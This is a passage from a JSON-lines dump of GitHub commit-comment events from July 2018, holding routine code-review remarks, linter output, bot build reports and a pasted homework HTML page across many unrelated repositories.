*style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\"Not a list\"),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:21:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L21) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(list(\"Not a data-frame\")),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:25:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L25) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:31:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L31) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:37:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L37) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:43:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L43) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:50:7:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L50) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​      .is_nonempty_list_of_data_frames(\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T17:52:43Z"}
{"id":"7990698256","type":"CommitCommentEvent","actor":{"login":"JustOff"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29768307,"position":null,"line":null,"path":null,"commit_id":"eb25a9bd708a4a688123190e07081909e9ffeab8","created_at":"2018-07-19T17:53:07Z","updated_at":"2018-07-19T17:53:07Z","author_association":"CONTRIBUTOR","body":"> these (optional) services are provided `asa` convenience to you\r\n\r\ntypo?"}},"created_at":"2018-07-19T17:53:07Z"}
{"id":"7990700395","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29768315,"position":19,"line":19,"path":"vowels.rb","commit_id":"922dde2713b047f07dbeda6bda4afeff1525edf2","created_at":"2018-07-19T17:53:34Z","updated_at":"2018-07-19T17:53:34Z","author_association":"NONE","body":"очень странный подход собирать массив, а потом делать из него hash, делай сразу hash"}},"created_at":"2018-07-19T17:53:34Z"}
{"id":"7990703146","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29768320,"position":4,"line":4,"path":"data.rb","commit_id":"922dde2713b047f07dbeda6bda4afeff1525edf2","created_at":"2018-07-19T17:54:09Z","updated_at":"2018-07-19T17:54:09Z","author_association":"NONE","body":"лучше сделать массив месяцев "}},"created_at":"2018-07-19T17:54:09Z"}
{"id":"7990705677","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29768325,"position":39,"line":39,"path":"data.rb","commit_id":"922dde2713b047f07dbeda6bda4afeff1525edf2","created_at":"2018-07-19T17:54:38Z","updated_at":"2018-07-19T17:54:38Z","author_association":"NONE","body":"странная история прыгать по массиву через 2, не делай массив из 24 символов"}},"created_at":"2018-07-19T17:54:38Z"}
{"id":"7990712230","type":"CommitCommentEvent","actor":{"login":"texhex"},"repo":{"name":"datagutten/BiosSledgehammer"},"payload":{"comment":{"id":29768350,"position":null,"line":null,"path":null,"commit_id":"057976126f49da6bc97b605b129fd53f0a377e91","created_at":"2018-07-19T17:55:56Z","updated_at":"2018-07-19T17:55:56Z","author_association":"NONE","body":"Thanks, I'll merge in a second. "}},"created_at":"2018-07-19T17:55:56Z"}
{"id":"7990715007","type":"CommitCommentEvent","actor":{"login":"mariogamer2"},"repo":{"name":"libretro/Lakka-LibreELEC"},"payload":{"comment":{"id":29768361,"position":null,"line":null,"path":null,"commit_id":"ddff7a1f42ddf56781c6c1eda9983f44087e3b32","created_at":"2018-07-19T17:56:30Z","updated_at":"2018-07-19T17:56:30Z","author_association":"NONE","body":"Is jit being worked on? I hope it will work one day, I really care about desmume."}},"created_at":"2018-07-19T17:56:30Z"}
{"id":"7990717245","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29768363,"position":34,"line":34,"path":"tn_01/right_triangle.rb","commit_id":"37de0325c28939bccb566f58130eed82358e5634","created_at":"2018-07-19T17:56:56Z","updated_at":"2018-07-19T17:56:56Z","author_association":"NONE","body":"ТЗ: Также, если треугольник является при этом равнобедренным.\r\n\r\nИз условия это не так очевидно, но проверять равнобедренность нужно только для прямоугольного треугольника. Так-что это условие нужно будет скобинировать с проверкой на прямоугольность. И что-б не считать ее два раза можно перенести вычисление Пифагора в отдельную переменную которая будет возвращать true/false и переиспользовать"}},"created_at":"2018-07-19T17:56:56Z"}
{"id":"7990718450","type":"CommitCommentEvent","actor":{"login":"markwkidd"},"repo":{"name":"libretro/mame2003-plus-libretro"},"payload":{"comment":{"id":29768367,"position":null,"line":null,"path":null,"commit_id":"1126c56649ff822818f1640b6da7493bae17deb8","created_at":"2018-07-19T17:57:10Z","updated_at":"2018-07-19T17:57:10Z","author_association":"COLLABORATOR","body":"No worries, sorry I tagged you, I didn't know twinaphex was going to make\nthe fix 😅\n\nOn Thu, Jul 19, 2018, 1:49 PM grant2258 <notifications@github.com> wrote:\n\n> this never errored on gnu90 was just a warning sorry about that\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/libretro/mame2003-plus-libretro/commit/1126c56649ff822818f1640b6da7493bae17deb8#commitcomment-29768249>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASphdg9dm-6OKAYobLOFY4kNQH73NYq6ks5uIMa_gaJpZM4VW09d>\n> .\n>\n"}},"created_at":"2018-07-19T17:57:10Z"}
{"id":"7990719247","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29768370,"position":34,"line":34,"path":"tn_01/right_triangle.rb","commit_id":"37de0325c28939bccb566f58130eed82358e5634","created_at":"2018-07-19T17:57:21Z","updated_at":"2018-07-19T17:57:21Z","author_association":"NONE","body":"И кстати скобки тут не нужны. У всех операторов одинаковый приоритет"}},"created_at":"2018-07-19T17:57:21Z"}
{"id":"7990719334","type":"CommitCommentEvent","actor":{"login":"cw75"},"repo":{"name":"cw75/tiered-storage"},"payload":{"comment":{"id":29768371,"position":4,"line":32,"path":"src/bedrock/kvs/self_depart_handler.cpp","commit_id":"307475c259b153248ccd85e388a0c5ef0b23f5d6","created_at":"2018-07-19T17:57:22Z","updated_at":"2018-07-19T17:57:22Z","author_association":"OWNER","body":"why are we printing this?"}},"created_at":"2018-07-19T17:57:22Z"}
{"id":"7990719806","type":"CommitCommentEvent","actor":{"login":"Qazimadedigba"},"repo":{"name":"Qazimadedigba/qazimadedigba.github.io"},"payload":{"comment":{"id":29768372,"position":4,"line":30,"path":"index.html","commit_id":"26b6561e9a560993edb6fd9a30750c3debac6ca6","created_at":"2018-07-19T17:57:27Z","updated_at":"2018-07-19T17:57:27Z","author_association":"OWNER","body":"//This is it."}},"created_at":"2018-07-19T17:57:27Z"}
{"id":"7990720227","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":29768373,"position":4,"line":120,"path":"components/family-studies/migrations/pom.xml","commit_id":"4288dbdb225e87e7203ab43f6489cdba5d75e6e9","created_at":"2018-07-19T17:57:33Z","updated_at":"2018-07-19T17:57:33Z","author_association":"MEMBER","body":"...for some reason removing a public method from `Family` class lowered the test coverage ration in the `migrations` component, even though this code never touch that method"}},"created_at":"2018-07-19T17:57:33Z"}
{"id":"7990722553","type":"CommitCommentEvent","actor":{"login":"FranDepascuali"},"repo":{"name":"FranDepascuali/react-native"},"payload":{"comment":{"id":29768379,"position":null,"line":null,"path":null,"commit_id":"83447610dbdbb4a6fa24d94c407cda4a0632dba4","created_at":"2018-07-19T17:58:01Z","updated_at":"2018-07-19T17:58:01Z","author_association":"OWNER","body":"We had to do this because of a bug on a UITextView inside a UIScrollview. We had the problem that it scrolls to a place that it shouldn't."}},"created_at":"2018-07-19T17:58:01Z"}
{"id":"7990723879","type":"CommitCommentEvent","actor":{"login":"FlorianRainer"},"repo":{"name":"FlorianRainer/npgsql"},"payload":{"comment":{"id":29768385,"position":null,"line":null,"path":null,"commit_id":"52cb4aba451fa19b5520e1544e4c5de22866ac72","created_at":"2018-07-19T17:58:17Z","updated_at":"2018-07-19T17:58:17Z","author_association":"OWNER","body":"strange why github is linking to this repo... how ever, i think he can see this as well so feel free to comment here ^^"}},"created_at":"2018-07-19T17:58:17Z"}
{"id":"7990724311","type":"CommitCommentEvent","actor":{"login":"vsreekanti"},"repo":{"name":"cw75/tiered-storage"},"payload":{"comment":{"id":29768386,"position":4,"line":32,"path":"src/bedrock/kvs/self_depart_handler.cpp","commit_id":"307475c259b153248ccd85e388a0c5ef0b23f5d6","created_at":"2018-07-19T17:58:22Z","updated_at":"2018-07-19T17:58:22Z","author_association":"COLLABORATOR","body":"Left over debug print. My bad. "}},"created_at":"2018-07-19T17:58:22Z"}
{"id":"7990725144","type":"CommitCommentEvent","actor":{"login":"ChrisLynchHPE"},"repo":{"name":"HewlettPackard/POSH-HPOneView"},"payload":{"comment":{"id":29768390,"position":null,"line":null,"path":null,"commit_id":"b86da78f3371e56b9a08567da0c980aa0e3ac9dc","created_at":"2018-07-19T17:58:32Z","updated_at":"2018-07-19T17:58:32Z","author_association":"MEMBER","body":"You actually can use PowerShell Gallery with PowerShell 3.0 and newer.  See [this](https://docs.microsoft.com/en-us/powershell/gallery/overview) Microsoft Doc on how."}},"created_at":"2018-07-19T17:58:32Z"}
{"id":"7990726523","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768393,"position":16,"line":16,"path":"src/test/java/htsjdk/utils/convertorToDatabase/ReadTest.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T17:58:47Z","updated_at":"2018-07-19T17:58:47Z","author_association":"OWNER","body":"ConvertEr"}},"created_at":"2018-07-19T17:58:47Z"}
{"id":"7990726865","type":"CommitCommentEvent","actor":{"login":"OnlyRaydek"},"repo":{"name":"OnlyRaydek/OnlyRaydek.github.io"},"payload":{"comment":{"id":29768394,"position":null,"line":null,"path":null,"commit_id":"ea5d263fce01bdf3c1fd2e65e3801e9c3fb32459","created_at":"2018-07-19T17:58:52Z","updated_at":"2018-07-19T17:58:52Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html>\r\n <head>\r\n  <meta charset=\"utf-8\">\r\n  <title>My Homework</title>\r\n </head>\r\n <body>\r\n \t<ul>\r\n \t\t<li><a href=\"\">lifestyle</a></li>\r\n \t\t<li><a href=\"\">photodiary</a></li>\r\n \t\t<li><a href=\"\">music</a>></li>\r\n \t\t<li><a href=\"\">travel</a>></li>\r\n \t</ul>\r\n \t<p>\r\n \t\t<img src=\"Img/Img_1.jpg\" alt=\"\">\r\n \t</p>\r\n \t<p>Lifestyle</p>\r\n \t<h2>More than just a music festival</h2>\r\n \t<p>Lorem ipsum dolor sit amet consectetur adipiscing elit. Deserum distinctio qui, placeat nam consequuntur ullam accusamus nisi nostrum dolores numquam at, velit possimus doloremque earum obcaecati id porro reprehederit eaque quaerat saepe atque eligendi, pariatur inventore cum. A dolor saepe perferendis, quasi assumenda reiciendis delectus quia est non, numquam officiis repellat placeat nihil aperiam repellendus sunt laudantium ad exercitationem in aliquid, nemo nam totam. Ipsum dolore exercitationem, non delectus modi debitis repudiae! Ipsa quasi totam voluptatibus voluptates! Architecto, expedita laboriosam quidem explicabo deleniti ducimus, hic exercitationem sed autem rerum harum dignissimos nam, nulla nobis magni quod doloremque repellendus molestiae?</p>\r\n \t<p>\r\n \t\t<img src=\"Img/Img_2.jpg\" alt=\"\">\r\n \t</p>\r\n \t<p>Lifestyle</p>\r\n \t<h2>Life tastes better with coffee</h2>\r\n \t<p>Lorem ipsum dolor sit amet consectetur adipiscing elit. Deserum distinctio qui, placeat nam consequuntur ullam accusamus nisi nostrum dolores numquam at, velit possimus doloremque earum obcaecati id porro reprehederit eaque quaerat saepe atque eligendi, pariatur inventore cum. A dolor saepe perferendis, quasi assumenda reiciendis delectus quia est non, numquam officiis repellat placeat nihil aperiam repellendus sunt laudantium ad exercitationem in aliquid, nemo nam totam. Ipsum dolore exercitationem, non delectus modi debitis repudiae! Ipsa quasi totam voluptatibus voluptates! Architecto, expedita laboriosam quidem explicabo deleniti ducimus, hic exercitationem sed autem rerum harum dignissimos nam, nulla nobis magni quod doloremque repellendus molestiae?</p>\r\n \t<p>\r\n \t\t<img src=\"Img/Img_3.jpg\" alt=\"\">\r\n \t</p>\r\n \t<p>Photodiary</p>\r\n \t<h2>American dream</h2>\r\n \t<p>Lorem ipsum dolor sit amet consectetur adipiscing elit. Deserum distinctio qui, placeat nam consequuntur ullam accusamus nisi nostrum dolores numquam at, velit possimus doloremque earum obcaecati id porro reprehederit eaque quaerat saepe atque eligendi, pariatur inventore cum. A dolor saepe perferendis, quasi assumenda reiciendis delectus quia est non, numquam officiis repellat placeat nihil aperiam repellendus sunt laudantium ad exercitationem in aliquid, nemo nam totam. Ipsum dolore exercitationem, non delectus modi debitis repudiae! Ipsa quasi totam voluptatibus voluptates! Architecto, expedita laboriosam quidem explicabo deleniti ducimus, hic exercitationem sed autem rerum harum dignissimos nam, nulla nobis magni quod doloremque repellendus molestiae?</p>\r\n \t<p>\r\n \t\t<img src=\"Img/Img_4.jpg\" alt=\"\">\r\n \t</p>\r\n \t<p>Photodiary</p>\r\n \t<h2>A day exploring the Alps</h2>\r\n \t<p>Lorem ipsum dolor sit amet consectetur adipiscing elit. Deserum distinctio qui, placeat nam consequuntur ullam accusamus nisi nostrum dolores numquam at, velit possimus doloremque earum obcaecati id porro reprehederit eaque quaerat saepe atque eligendi, pariatur inventore cum. A dolor saepe perferendis, quasi assumenda reiciendis delectus quia est non, numquam officiis repellat placeat nihil aperiam repellendus sunt laudantium ad exercitationem in aliquid, nemo nam totam. Ipsum dolore exercitationem, non delectus modi debitis repudiae! Ipsa quasi totam voluptatibus voluptates! Architecto, expedita laboriosam quidem explicabo deleniti ducimus, hic exercitationem sed autem rerum harum dignissimos nam, nulla nobis magni quod doloremque repellendus molestiae?</p>\r\n \t<form>\r\n  <button>load more</button>\r\n</form>\r\n </body>\r\n</html>"}},"created_at":"2018-07-19T17:58:52Z"}
{"id":"7990729167","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29768398,"position":11,"line":11,"path":"tn_01/triangle_area.rb","commit_id":"eb98afd81abfdc39438897a1f67ff1da90c87cac","created_at":"2018-07-19T17:59:20Z","updated_at":"2018-07-19T17:59:20Z","author_association":"NONE","body":"для улучшения читаемости кода лучше давать переменным и методам \"говорящие\" имена. Тут например можно вместо a, h использовать base, height, area."}},"created_at":"2018-07-19T17:59:20Z"}
{"id":"7990729568","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768399,"position":18,"line":18,"path":"src/test/java/htsjdk/utils/convertorToDatabase/ReadTest.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T17:59:25Z","updated_at":"2018-07-19T17:59:25Z","author_association":"OWNER","body":"имена констант принято писать заглавными буквами\r\n"}},"created_at":"2018-07-19T17:59:25Z"}
{"id":"7990730093","type":"CommitCommentEvent","actor":{"login":"gizmo21"},"repo":{"name":"cdce8p/mcf2pdf"},"payload":{"comment":{"id":29768401,"position":null,"line":null,"path":null,"commit_id":"bced1e8d0f0ad6d958b03f52d3c15e145b4c5f62","created_at":"2018-07-19T17:59:31Z","updated_at":"2018-07-19T17:59:31Z","author_association":"NONE","body":"@cdce8p  can you link to a windows binary zip with your fixes from beginning of this year, especially the \"\r\nFixed spine, other improvements\" one would be very welcome for my heavy pages projects.\r\n\r\nI though albrechtf would implement some of it soon but here we are half year later same probs.\r\n\r\n"}},"created_at":"2018-07-19T17:59:31Z"}
{"id":"7990731177","type":"CommitCommentEvent","actor":{"login":"jandubois"},"repo":{"name":"SUSE/scf"},"payload":{"comment":{"id":29768408,"position":5,"line":16,"path":"src/scf-release/src/acceptance-tests-brain/test-scripts/010_nfspersi_test.sh","commit_id":"bf83bc85351889f531cee56db27eb33581fad926","created_at":"2018-07-19T17:59:44Z","updated_at":"2018-07-19T17:59:44Z","author_association":"MEMBER","body":"Sorry for nit-picking now, but `CFN` doesn't make much sense after the rename, maybe use `NS`, to match the `SC` name for the storage class?"}},"created_at":"2018-07-19T17:59:44Z"}
{"id":"7990732962","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768412,"position":28,"line":28,"path":"src/test/java/htsjdk/utils/convertorToDatabase/ReadTest.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:00:06Z","updated_at":"2018-07-19T18:00:06Z","author_association":"OWNER","body":"нигде не используется"}},"created_at":"2018-07-19T18:00:06Z"}
{"id":"7990734179","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29768418,"position":null,"line":null,"path":null,"commit_id":"55777e3ff6b0484fcd23659b0a29262bd0e87d44","created_at":"2018-07-19T18:00:18Z","updated_at":"2018-07-19T18:00:18Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (763 of 1700 tests passed, 1 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-44.88%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-19T18:00:18Z"}
{"id":"7990736598","type":"CommitCommentEvent","actor":{"login":"CircleXing001"},"repo":{"name":"CircleXing001/DL-tools"},"payload":{"comment":{"id":29768430,"position":null,"line":null,"path":null,"commit_id":"c9579d6f6f23e4011f9958d0248854b861b21be6","created_at":"2018-07-19T18:00:45Z","updated_at":"2018-07-19T18:00:45Z","author_association":"OWNER","body":"DATASET"}},"created_at":"2018-07-19T18:00:45Z"}
{"id":"7990737146","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware"},"payload":{"comment":{"id":29768431,"position":null,"line":null,"path":null,"commit_id":"679259aab550a5219d610f0c200b8edafa34456a","created_at":"2018-07-19T18:00:51Z","updated_at":"2018-07-19T18:00:51Z","author_association":"CONTRIBUTOR","body":"it does not enlage the created images in size of packages included"}},"created_at":"2018-07-19T18:00:51Z"}
{"id":"7990741162","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768444,"position":77,"line":77,"path":"src/test/java/htsjdk/utils/convertorToDatabase/ReadTest.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:01:35Z","updated_at":"2018-07-19T18:01:35Z","author_association":"OWNER","body":"в тесте нет ассертов\r\nне понятно, что он тестирует\r\nнадо как минимум записать данные в БД, а потом проверить, что они там есть"}},"created_at":"2018-07-19T18:01:35Z"}
{"id":"7990744217","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29768455,"position":null,"line":null,"path":null,"commit_id":"bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46","created_at":"2018-07-19T18:02:11Z","updated_at":"2018-07-19T18:02:11Z","author_association":"MEMBER","body":" yeah! usually this is how i solve things related to git\n:)\n\n\nOn 19-Jul-2018 at 05:46 PM, Sanchit Sharma wrote:\n\n\nHehe... I got a workaround, just clone the repo again... But there would be\na better way to do this.\n\nOn Thu 19 Jul, 2018, 11:11 PM Arthur Tkachenko, <notifications@github.com>\nwrote:\n\n> not sure if it helps with your situation, but just understading that this\n> can be solved easily - at least make it easier to feel :)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <\nhttps://github.com/GroceriStar/react-only-intern-23/commit/bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46#commitcomment-29768138>,\n\n> or mute the thread\n> <\nhttps://github.com/notifications/unsubscribe-auth/Af_sDOjEQ7UAVa2oIg-K27d6248y7Dllks5uIMTbgaJpZM4VWk4P>\n\n> .\n>\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub\n<https://github.com/GroceriStar/react-only-intern-23/commit/bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46#commitcomment-29768212>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/ABZrDtFkQ1KLsQ3oP3YHNfPy5CU8m5E0ks5uIMXygaJpZM4VWk4P>\n.\n"}},"created_at":"2018-07-19T18:02:11Z"}
{"id":"7990752167","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29768475,"position":13,"line":13,"path":"tn_01/triangle_area.rb","commit_id":"eb98afd81abfdc39438897a1f67ff1da90c87cac","created_at":"2018-07-19T18:03:33Z","updated_at":"2018-07-19T18:03:33Z","author_association":"NONE","body":"Кстати вычисления лучше записать в переменную, и уже переменную подставить в интерполяцию. Опять-же, что-б видеть, что мы делаем не зная задания. (хотя тут мы в принципе пишем, что это площадь треугольника, так-что не так критично, но когда строки с интерполяцией разарстаются их становится трудно читать в императивном стиле)"}},"created_at":"2018-07-19T18:03:33Z"}
{"id":"7990754924","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768478,"position":15,"line":15,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Baracode.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:04:07Z","updated_at":"2018-07-19T18:04:07Z","author_association":"OWNER","body":"ID мы должны выдавать сами, чтобы быть уверенными в том, что они уникальны и неизменны во времени"}},"created_at":"2018-07-19T18:04:07Z"}
{"id":"7990755916","type":"CommitCommentEvent","actor":{"login":"pq"},"repo":{"name":"flutter/flutter-intellij"},"payload":{"comment":{"id":29768480,"position":4,"line":304,"path":"src/io/flutter/logging/FlutterLogTree.java","commit_id":"6c968f95ac54511d9deffdb244733d9946065941","created_at":"2018-07-19T18:04:18Z","updated_at":"2018-07-19T18:04:18Z","author_association":"COLLABORATOR","body":"Good catch.  Thanks @jacob314  and @quangson91 !"}},"created_at":"2018-07-19T18:04:18Z"}
{"id":"7990756771","type":"CommitCommentEvent","actor":{"login":"cl420"},"repo":{"name":"jaksfi/steam-url-sniper-js"},"payload":{"comment":{"id":29768482,"position":33,"line":31,"path":"README.md","commit_id":"101495e95bd1302153d71d523880b950a232af92","created_at":"2018-07-19T18:04:29Z","updated_at":"2018-07-19T18:04:29Z","author_association":"NONE","body":"Stating your credentials should be line 28 right? Not 15"}},"created_at":"2018-07-19T18:04:29Z"}
{"id":"7990758342","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768487,"position":18,"line":18,"path":"src/main/java/htsjdk/utils/convertorToDatabase/MainHead.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:04:49Z","updated_at":"2018-07-19T18:04:49Z","author_association":"OWNER","body":"ID лучше делать Long"}},"created_at":"2018-07-19T18:04:49Z"}
{"id":"7990759338","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768488,"position":20,"line":20,"path":"src/main/java/htsjdk/utils/convertorToDatabase/MainHead.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:05:02Z","updated_at":"2018-07-19T18:05:02Z","author_association":"OWNER","body":"не уверен, что эта аннотация тут работает"}},"created_at":"2018-07-19T18:05:02Z"}
{"id":"7990764060","type":"CommitCommentEvent","actor":{"login":"iwilllate"},"repo":{"name":"iwilllate/singly-linked-list"},"payload":{"comment":{"id":29768497,"position":null,"line":null,"path":null,"commit_id":"ff2dd4518d59c7c06f80353a46d32e6795ce3996","created_at":"2018-07-19T18:05:59Z","updated_at":"2018-07-19T18:05:59Z","author_association":"OWNER","body":"This is a comment\r\n"}},"created_at":"2018-07-19T18:05:59Z"}
{"id":"7990765579","type":"CommitCommentEvent","actor":{"login":"sanchit94"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29768499,"position":null,"line":null,"path":null,"commit_id":"bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46","created_at":"2018-07-19T18:06:17Z","updated_at":"2018-07-19T18:06:17Z","author_association":"COLLABORATOR","body":"But now I am getting error that `data.getAllergies()` is not a function. I think the import of groceristar fetch is not working!"}},"created_at":"2018-07-19T18:06:17Z"}
{"id":"7990765610","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768500,"position":20,"line":20,"path":"src/main/java/htsjdk/utils/convertorToDatabase/MainHead.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:06:18Z","updated_at":"2018-07-19T18:06:18Z","author_association":"OWNER","body":"лучше использовать @Column(nullable = false)"}},"created_at":"2018-07-19T18:06:18Z"}
{"id":"7990768327","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29768514,"position":18,"line":18,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Read.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T18:06:51Z","updated_at":"2018-07-19T18:06:51Z","author_association":"OWNER","body":"Long"}},"created_at":"2018-07-19T18:06:51Z"}
{"id":"7990771149","type":"CommitCommentEvent","actor":{"login":"voodoo81-81"},"repo":{"name":"next-age-stories/next-age-stories"},"payload":{"comment":{"id":29768520,"position":null,"line":null,"path":null,"commit_id":"1961bfe943d84bdbd50a1f00436e6948e408b865","created_at":"2018-07-19T18:07:26Z","updated_at":"2018-07-19T18:07:26Z","author_association":"NONE","body":"#2 "}},"created_at":"2018-07-19T18:07:26Z"}
{"id":"7990776648","type":"CommitCommentEvent","actor":{"login":"willsunnn"},"repo":{"name":"we-vxtn/EgyptianWar"},"payload":{"comment":{"id":29768530,"position":null,"line":null,"path":null,"commit_id":"a50271d254efd15d6912baa43a969d2e2b7eec2c","created_at":"2018-07-19T18:08:34Z","updated_at":"2018-07-19T18:08:34Z","author_association":"MEMBER","body":"-.- nice edit you got here bud :P"}},"created_at":"2018-07-19T18:08:34Z"}
{"id":"7990777209","type":"CommitCommentEvent","actor":{"login":"davidstl"},"repo":{"name":"getbraincloud/BCChat"},"payload":{"comment":{"id":29768531,"position":null,"line":null,"path":null,"commit_id":"74e61444403c736fe5ad8a2e348e1dfb1ed8a2f7","created_at":"2018-07-19T18:08:41Z","updated_at":"2018-07-19T18:08:41Z","author_association":"CONTRIBUTOR","body":"+1"}},"created_at":"2018-07-19T18:08:41Z"}
